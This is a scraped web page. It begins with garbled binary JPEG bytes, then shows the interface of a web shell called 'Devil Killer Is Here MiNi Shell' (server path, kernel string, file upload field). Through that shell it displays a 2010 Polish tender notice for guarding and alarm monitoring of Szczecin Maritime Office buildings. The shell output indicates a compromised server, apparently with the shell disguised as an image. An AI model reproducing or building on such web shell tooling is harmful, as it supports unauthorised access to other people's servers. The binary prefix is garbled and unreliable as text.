JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101117/371814-N-2010.html

<p class="kh_header"><b>Szczecin: Całodobowa ochrona  fizyczna osób i mienia w budynkach : Czerwonego Ratusz - Szczecin pl. Batorego 4, Kapitanatu Portu - Szczecin, ul. Jana z Kolna 9, Kapitanatu Portu - Świnoujście ul. Nabrzeże Władysława IV 7 oraz monitoringu systemu alarmowego w Kapitanacie Portu w Świnoujściu.</b><br>
<b>Numer ogłoszenia: 371814 - 2010; data zamieszczenia: 17.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Szczecinie , pl. Stefana Batorego 4, 70-207 Szczecin, woj. zachodniopomorskie, tel. 091 4403423, 4403523, faks 091 4403441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ums.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa ochrona  fizyczna osób i mienia w budynkach : Czerwonego Ratusz - Szczecin pl. Batorego 4, Kapitanatu Portu - Szczecin, ul. Jana z Kolna 9, Kapitanatu Portu - Świnoujście ul. Nabrzeże Władysława IV 7 oraz monitoringu systemu alarmowego w Kapitanacie Portu w Świnoujściu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona fizyczna osób i mienia, sprawowanie nadzoru technicznego nad urządzeniami będącymi  w systemie kamer monitorujących znajdujących się w chronionych obiektach:

UWAGA :
Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć ofertę na część 1 lub część 2 bądź na obie części zamówienia.

Część 1- dot. budynku Czerwonego Ratusza i Kapitanatu Portu Szczecin


a) Urząd Morski w Szczecinie Plac Batorego 4, Szczecin (budynek Czerwonego Ratusza):
- powierzchnia całkowita działki - 0,4498 ha
- powierzchnia zabudowy (budynek Czerwonego Ratusza) - 2422 m2
- kondygnacje nadziemne - 5
- kondygnacje podziemne - 2
Budynek posiada monitorujący system kamer wewnętrznych i zewnętrznych.
Ochronie podlegać będzie także teren objęty zasięgiem kamer zewnętrznych na którym znajdują się miejsca parkingowe dla samochodów służbowych i prywatnych należących do pracowników Urzędu Morskiego w Szczecinie. 

b) Kapitanat Portu Szczecin, ul. Jana z Kolna 9, Szczecin:
- powierzchnia całkowita działki  - 0.7803 ha
- powierzchnia zabudowy- 602 m2 (budynek Kapitanatu wraz z garażami)
- kondygnacje nadziemne - 3
Na terenie nieruchomości znajduje się monitorujący system kamer zewnętrznych.

1. Wykonawca zobowiązany jest do:
a)	utrzymania stałych posterunków:
-	2-osobowego w budynku (Czerwony Ratusz) przy pl. Batorego 4 w Szczecinie przez całą dobę we wszystkie dni robocze i wolne od pracy, 
-	1-osobowego w budynku Kapitanatu Portu w Szczecinie przez całą dobę we wszystkie dni robocze i wolne od pracy,

b)	wykonywania napraw i konserwacji systemów monitorujących składających się z kamer zewnętrznych i wewnętrznych znajdujących się w budynku Czerwonego Ratusza oraz kamer zewnętrznych znajdujących się na posesji Kapitanatu Portu w Szczecinie, przy pokryciu udokumentowanych kosztów materiałowych przez Zamawiającego,

c)	wykonania Planu ochrony dla poszczególnych chronionych jednostek w dwóch egzemplarzach w terminie 14 dni od daty podpisania umowy, według wytycznych zawartych w art. 7 ustawy z dnia 22 sierpnia 1997 r.  o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 ze zmianami) z uwzględnieniem wewnętrznych procedur postępowania określonych przez Zamawiającego w celu zapewnienia bezpieczeństwa (m.in. zasady alarmowania, zasady ewakuacji),

d)	wykonywania czynności w zakresie realizacji niniejszego zamówienia pracownikami z odpowiednimi licencjami pracowników ochrony fizycznej lub pracowników zabezpieczenia technicznego,

e)	sprawowania nadzoru i kontroli nad realizacją zadań służby ochrony,

f)	zadbania o to aby personel ochrony w czasie pracy w poszczególnych jednostkach był wyposażony w jednolity ubiór tj.: mundur, garnitur itp., elementy identyfikujące firmę,

g)	zainstalowania na czas usługi i na własny koszt, w portierniach chronionych obiektów, systemu antynapadowego wraz z pilotami antynapadowymi dla pracowników ochrony, w oparciu o łączność radiową z Systemem Monitorowania Alarmów Wykonawcy i załogą interwencyjną,  

h)	wyposażenia pracowników ochrony w niezbędny sprzęt przymusu bezpośredniego oraz środki łączności z centralą,

i)	dbałości o dyscyplinę pracy i schludny wygląd zewnętrzny podległych pracowników ochrony,

j)	okresowego kontrolowanie stałych posterunków przez patrol/załogę interwencyjną  w godzinach 2200 a 600, z wpisem osób kontrolujących do książki dyżuru. Wskazane jest aby przedmiotowe kontrole przeprowadzać raz na tydzień,

k)	przestrzegania obowiązujących na terenie Urzędu Morskiego w Szczecinie ładu i dyscypliny pracy i zakazu spożywania alkoholu lub stawiania się do pracy w stanie wskazującym na spożycie alkoholu bądź innego środka odurzającego,

2. Ochrona fizyczna osób i mienia jednostek chronionych polegać będzie między innymi na:
-	natychmiastowym reagowaniu na wszelkie (również telefoniczne) zgłoszenia zagrożenia osób lub obiektu,
-	zapewnieniu bezpieczeństwa pracownikom, najemcom oraz interesantom i gościom Urzędu Morskiego,
-	ochronie siedziby poszczególnych jednostek przed napadem, włamaniem, penetracją osób niepożądanych, kradzieżą, atakami wandalizmu, terroryzmu itp.,
-	w przypadku jakichkolwiek zagrożeń niezwłocznym powiadamianiu Dyrektora Urzędu lub innych osób przez niego upoważnionych, Policji, Straży Pożarnej i innych służb oraz współdziałanie z ww. w celu zapewnienia prawidłowej ochrony,
-	zapewnieniu wsparcia grupy interwencyjnej w przypadku działań wzmocnienia ochrony stacjonarnej w czasie nie dłuższym niż 5 minut od zgłoszenia,
-	zleconej obsłudze urządzeń systemu włamania i napadu, kontroli ostępu,     p. poż. oraz telewizji przemysłowej w przypadku ich występowania w chronionym obiekcie.
3. Główne obowiązki pracownika ochrony:
-	niedopuszczenie do wejścia na teren chronionego obiektu osób nieuprawnionych i będących pod wpływem alkoholu lub środków odurzających,
-	informowanie interesantów odnośnie osoby i miejsca załatwienia spraw i ich pokierowanie,
-	podejmowanie niezbędnych interwencji w przypadku stwierdzenia naruszenia zasad bezpieczeństwa ochranianych osób i mienia,
-	przeciwdziałanie zaistnieniu potencjalnych zagrożeń zewnętrznych i wewnętrznych,
-	sprawne działanie w przypadku zaistnienia sytuacji kryzysowych,
-	kontroli ruchu osobowo-materiałowego wewnątrz i na zewnątrz obiektów oraz podejmowaniu działań,
-	wydawanie i przyjmowanie kluczy do pomieszczeń służbowych oraz ich ochrona,
-	nadzór nad prawidłowym wykorzystaniem miejsc parkingowych należących do poszczególnymi chronionych jednostek oraz niedopuszczenie do korzystania z miejsc parkingowych przez osoby nieuprawnione (nie będące pracownikami Urzędu Morskiego),
-	sprawdzanie stanu bezpieczeństwa obiektu i pomieszczeń pod kątem nienaruszalności zamknięć i plomb,
-	czytelne prowadzenie dokumentacji służby ochrony,
-    prowadzenie książki służby ochrony mienia,
-	przestrzeganie dyscypliny pracy oraz właściwej prezencji,
-	egzekwowanie od osób przebywających na terenie obiektów przepisów porządkowych , p. poż. Itp.,
-	obchód obiektów i sprawdzanie czy po godzinach pracy oraz w dni wolne od pracy:
- pozamykane są okna,
- zakręcone są kurki od wody,
- pogaszone są światła ,
- na terenie poszczególnych jednostek nie przebywają osoby, które nie mają do tego uprawnień,
-	zamykanie i otwieranie drzwi wejściowych, bram wjazdowych, szlabanów itp.,
-	reagowania na zgłoszenia elektronicznych systemów sygnalizacyjnych oraz na zauważone zdarzenia mogące mieć wpływ na wystąpienie strat w mieniu (zalanie pomieszczeń, uszkodzenia oświetlenia, uszkodzenia zamków, drzwi, samozamykaczy, przecieki itp.) Sposób reagowania zostanie określony w Planie Ochrony,
-	Posiadania podczas wykonywania obowiązków służbowych aktualnej licencji.

Część 2 - dot. Kapitanatu Portu Świnoujście

Przedmiotem zamówienia jest ochrona fizyczna osób i mienia, całodobowy monitoring systemu alarmowego wraz z interwencją patrolu oraz sprawowanie nadzoru technicznego nad urządzeniami będącymi  w systemie alarmowym znajdującym się w chronionym obiekcie tj.:

Kapitanat Portu Świnoujście Wybrzeże Władysława IV 7, Świnoujście:
- powierzchnia całkowita działki - 0.3291 ha
- powierzchnia zabudowy budynku - 750 m2
- kondygnacje nadziemne - 2
- kondygnacje podziemne - 1
Budynek objęty systemem alarmowym (czujki ruchu).
Budynek Kapitanatu będzie podlegał ochronie poprzez całodobowe monitorowanie systemu alarmowego i pracownika ochrony w dni robocze od godz. 6.30 do        godz. 16.30, a także teren poprzez okresowe patrolowanie przez w/w pracownika ochrony. 

1. Wykonawca zobowiązany jest do:

a)	utrzymania stałego 1-osobowego posterunku w budynku Kapitanatu Portu w Świnoujściu w dni robocze od godz. 6.30 do godz. 16.30,
b)	dwutorowego przesyłania  sygnału od systemu alarmowego zainstalowanego w budynku Kapitanatu do Systemu Monitorowania Alarmów Wykonawcy:
	- drogą radiową po zainstalowaniu własnego modułu radiowego,
	- po linii telefonicznej
c)	całodobowego monitorowania przez Alarmowe Centrum Odbiorcze (System Monitorowania Alarmów) Wykonawcy systemu alarmowego znajdującego się w Kapitanacie Portu  w Świnoujściu, we wszystkie dni (również w dni robocze w godzinach przebywania pracownika ochrony) wraz z interwencją patrolu oraz:

1)	rejestrować określone sygnały przyjmowane z lokalnego systemu alarmowego przez okres minimum 30 dni,
2)	utrzymywać system alarmowy przez cały czas trwania umowy w stanie przydatnym do używania,
3)	dokonywać odpowiednich napraw, czynności konserwacyjnych i przeglądów okresowych oraz w ramach tych czynności testować system, przy pokryciu udokumentowanych kosztów materiałowych przez Zamawiającego,

d)	wykonania Planu ochrony dla chronionego obiektu w dwóch egzemplarzach w terminie 14 dni od daty podpisania umowy, według wytycznych zawartych w art. 7 ustawy z dnia 22 sierpnia 1997 r.  o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 ze zmianami) z uwzględnieniem wewnętrznych procedur postępowania określonych przez Zamawiającego w celu zapewnienia bezpieczeństwa (m.in. zasady alarmowania, zasady ewakuacji),

e)	wykonywania czynności w zakresie realizacji niniejszego zamówienia pracownikami z odpowiednimi licencjami pracowników ochrony fizycznej lub pracowników zabezpieczenia technicznego,
f)	sprawowania nadzoru i kontroli nad realizacją zadań służby ochrony,

g)	zadbania o to aby personel ochrony w czasie pracy był wyposażony w jednolity ubiór tj.: mundur, garnitur itp., elementy identyfikujące firmę,

h)	zainstalowania na czas usługi i na własny koszt, w portierni chronionego obiektu, systemu antynapadowego wraz z pilotami antynapadowymi dla pracowników ochrony, w oparciu o łączność radiową z Systemem Monitorowania Alarmów Wykonawcy i załogą interwencyjną,

i)	wyposażenia pracowników ochrony w niezbędny sprzęt przymusu bezpośredniego oraz środki łączności z centralą,

j)	dbałości o dyscyplinę pracy i schludny wygląd zewnętrzny podległych pracowników ochrony,

k)	okresowego kontrolowania stałego posterunku przez patrol/załogę interwencyjną   z wpisem osób kontrolujących do książki dyżuru. Wskazane jest aby przedmiotowe kontrole przeprowadzać raz na tydzień,

l)	przestrzegania obowiązujących na terenie Urzędu Morskiego w Szczecinie ładu i dyscypliny pracy i zakazu spożywania alkoholu lub stawiania się do pracy w stanie wskazującym na spożycie alkoholu bądź innego środka odurzającego,

2. Ochrona fizyczna osób i mienia jednostek chronionych polegać będzie między innymi na:
-	natychmiastowym reagowaniu na wszelkie (również telefoniczne) zgłoszenia zagrożenia osób lub obiektu,
-	zapewnieniu bezpieczeństwa pracownikom, najemcom oraz interesantom i gościom Urzędu Morskiego,
-	ochronie siedziby przed napadem, włamaniem, penetracją osób niepożądanych, kradzieżą, atakami wandalizmu, terroryzmu itp.,
-	w przypadku jakichkolwiek zagrożeń niezwłocznym powiadamianiu Kapitana Portu lub innych osób upoważnionych przez Dyrektora Urzędu, Policji, Straży Pożarnej i innych służb oraz współdziałanie z ww. w celu zapewnienia prawidłowej ochrony,
-	zapewnieniu wsparcia grupy interwencyjnej w przypadku działań wzmocnienia ochrony stacjonarnej w czasie nie dłuższym niż 5 minut od zgłoszenia,
-	zleconej obsłudze urządzeń systemu włamania i napadu, kontroli dostępu, p. poż. oraz telewizji przemysłowej w przypadku ich występowania w chronionym obiekcie.
3. Główne obowiązki pracownika ochrony:
-	niedopuszczenie do wejścia na teren chronionego obiektu osób nieuprawnionych i będących pod wpływem alkoholu lub środków odurzających,
-	informowanie interesantów odnośnie osoby i miejsca załatwienia spraw i ich pokierowanie,
-	podejmowanie niezbędnych interwencji w przypadku stwierdzenia naruszenia zasad bezpieczeństwa ochranianych osób i mienia,
-	przeciwdziałanie zaistnieniu potencjalnych zagrożeń zewnętrznych i wewnętrznych,
-	sprawne działanie w przypadku zaistnienia sytuacji kryzysowych,
-	kontroli ruchu osobowo-materiałowego wewnątrz i na zewnątrz obiektów oraz podejmowaniu działań,
-	wydawanie i przyjmowanie kluczy do pomieszczeń służbowych oraz ich ochrona,
-	sprawdzanie stanu bezpieczeństwa obiektu i pomieszczeń pod kątem nienaruszalności zamknięć i plomb,
-	czytelne prowadzenie dokumentacji służby ochrony,
- prowadzenie książki służby ochrony mienia,
-	przestrzeganie dyscypliny pracy oraz właściwej prezencji,
-	egzekwowanie od osób przebywających na terenie obiektu przepisów porządkowych , p. poż. Itp.,
-	obchód obiektu i sprawdzanie czy po godzinach pracy:
- pozamykane są okna,
- zakręcone są kurki od wody,
- pogaszone są światła ,
- nie przebywają osoby, które nie mają do tego uprawnień,
-	zamykanie i otwieranie drzwi wejściowych, bramy wjazdowej, 
-	reagowania na zgłoszenia elektronicznych systemów sygnalizacyjnych oraz na zauważone zdarzenia mogące mieć wpływ na wystąpienie strat w mieniu (zalanie pomieszczeń, uszkodzenia oświetlenia, uszkodzenia zamków, drzwi, samozamykaczy, przecieki itp.) Sposób reagowania zostanie określony w Planie Ochrony,
-	posiadania podczas wykonywania obowiązków służbowych aktualnej licencji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi wykonania zamówienia;
4)	sytuacji ekonomicznej i finansowej
2.	Każdy z Wykonawców ma obowiązek złożyć następujące dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)	Oświadczenie Wykonawcy, o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru, stanowiącego Załącznik nr 2 do niniejszej SIWZ.
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną.
2)	Oświadczenie Wykonawcy o braku podstaw do wykluczenia w okolicznościach o których mowa w art. 24 ust.1, według wzoru stanowiącego Załącznik nr 3 do niniejszej SIWZ
3)	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru , wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy,
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną.
  4)   Wykaz usług - Załącznik nr 4, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usług stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz dokumenty - np. referencje potwierdzające, że usługi te zostały wykonane należycie.
Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie, jeżeli wykaże, iż w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum trzy usługi podobne do objętych przedmiotem zamówienia, o wartości nie mniejszej niż wynagrodzenie za wykonanie przedmiotu zamówienia określone przez  Wykonawcę w Formularzu oferty - Załącznik Nr 1.
W przypadku składania oferty wspólnej Wykonawcy składający ofertę wspólną składają jeden wspólny  wykaz .
5) Wykaz osób - Załącznik Nr 5, które wykonywać będą zamówienie i posiadają 
           wymagane licencje.
           Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania 
           zamówienia, jeżeli wykaże :
Dla części 1 budynek Czerwonego Ratusza i Kapitanatu Portu Szczecin:
            
 - jeden pracownik posiadający licencję II stopnia pracownika ochrony fizycznej upoważniającej do opracowania planu ochrony i kierowania zespołem pracowników ochrony (art.27 ustawy o ochronie osób i mienia Dz. U. Nr 114 poz. 740 z 1997 roku ze zm.),
- jeden  pracownik posiadający minimum licencję I stopnia zabezpieczenia technicznego  ( naprawa i konserwacja systemu kamer monitorujących obiekty) (art.27 ustawy o ochronie osób i mienia Dz. U. Nr 114 poz. 740 z 1997 roku ze zm.),
- dwunastu  pracowników ochrony fizycznej ( 8 pracowników - Czerwony Ratusz, 4 pracowników Kapitanat Portu Szczecin) posiadających minimum      
	licencję pierwszego stopnia pracowników ochrony fizycznej,
Dla części 2 budynek Kapitanatu Portu Świnoujście:
	- jeden pracownik posiadający licencję II stopnia pracownika ochrony fizycznej upoważniającej do opracowania planu ochrony i kierowania zespołem pracowników ochrony (art.27 ustawy o ochronie osób i mienia Dz. U. Nr 114 poz. 740 z 1997 roku ze zm.),
     -  jeden pracownik posiadający minimum licencję I stopnia zabezpieczenia technicznego  ( naprawa i konserwacja systemu kamer monitorujących obiekty) (art.27 ustawy o ochronie osób i mienia Dz. U. Nr 114 poz. 740 z 1997 roku ze zm.),
- dwóch pracowników ochrony fizycznej posiadających minimum licencję pierwszego stopnia pracowników ochrony fizycznej,
 Wykonawca musi dołączyć do ofert kserokopie licencji tych osób.
W przypadku składania oferty wspólnej Wykonawcy składający ofertę wspólną składają jeden wspólny  wykaz
5)	Aktualna koncesja lub zezwolenie lub licencja wydana przez MSWiA na prowadzenie działalności gospodarczej w zakresie usług objętych przedmiotem zamówienia.
6) Oświadczenie według wzoru stanowiącego Załącznik nr 6 do SIWZ wskazujące część zamówienia, której wykonanie Wykonawca powierzy Podwykonawcom (jeżeli Wykonawca przewiduje udział Podwykonawców).
7) W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.     
3.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 SIWZ - Formularz oferty - Zał. Nr 1;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	pełnomocnictwo, o którym mowa w Rozdziale III pkt 1 SIWZ ;
Tylko w przypadku składania oferty wspólnej  
      3) kserokopia koncesji.
4.  W przypadku Wykonawcy mającego siedzibę na terytorium Rzeczpospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu  sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  ofert, z tym, że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

